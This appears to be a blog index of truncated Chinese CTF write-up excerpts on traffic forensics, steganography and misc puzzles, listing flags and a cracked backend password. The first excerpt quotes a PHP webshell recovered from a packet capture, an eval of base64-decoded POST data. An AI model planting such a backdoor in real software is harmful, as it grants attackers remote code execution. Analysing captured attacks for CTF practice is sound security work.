碟中谍 2.0 在 流3 中发现上传的马子 解析后如下 68a943=@eval(@base64_decode($_POST['td48c7e666f11'])); &td…

CTF部分 热身签到 十六进制和十进制解码 ctfshow{happy_2026_with_cs2026!} HappySong wav有两种不同的频率的声音，转换成0和1 import numpy …

流量分析 SnakeBackdoor-1 攻击者爆破成功的后台密码是什么？，结果提交形式：flag{xxxxxxxxx} 在流1764中找到正确的密码 flag{zxcvbnm123} SnakeBa…

今年没打，看到学弟们在实验室和在寝室彻夜打比赛，感觉回到了23年的那个冬天。 这时小学弟们第一次打的比较大型的线上赛，Writeup看了下写的还是不错，这是他们的博客Link： 【Web】Luoou：…

Written by G3rling@N0wayback/C0ba1t Forensics Telnet用户密码抓取 追踪TCP流量，但是发现流量包中存在数据的杂糅，对单个方向进行查看 可以得到用户和…

Written by G3rling @N0wayback/C0ba1t 前言 大家好我是G3rling，很高兴今年以出题人和院校负责人的身份参与ISCTF2025。 本次比赛我出的题目是 “小蓝鲨的…

Misc Forensics1 分析流量包得到URL和路径 得到Flag lrtctf{tsdandassociates.co.sz/w0ks//?YO=1702920835} 隐藏的二维码 4部分二…

Run,ZIP,Run! 伪加密得到 咕噜的备忘录.txt “我点高香敬神明，抵我心中意难平…” 我一边哼着抽象小曲，一边在IDE里奋笔疾书。作为一名资深抽象带师，我的活突出一个颠倒——白天睡觉，晚上…

是谁没有阅读参赛须知？ 签到题，在参赛须知中搜索得到Flag LILCTF{Me4n1ngFu1_w0rDs} PNG Master 文件末尾提取出 6K6p5L2g6Zq+6L+H55qE5LqL5…

easy_misc 首先得到一张缺少定位码的png，补全后发现这是一个假的。 发现png后存在加密的zip文件，提取出来，尝试刚才扫码得到的信息无果，伪加密解开，再brainfuck解码。得到Key …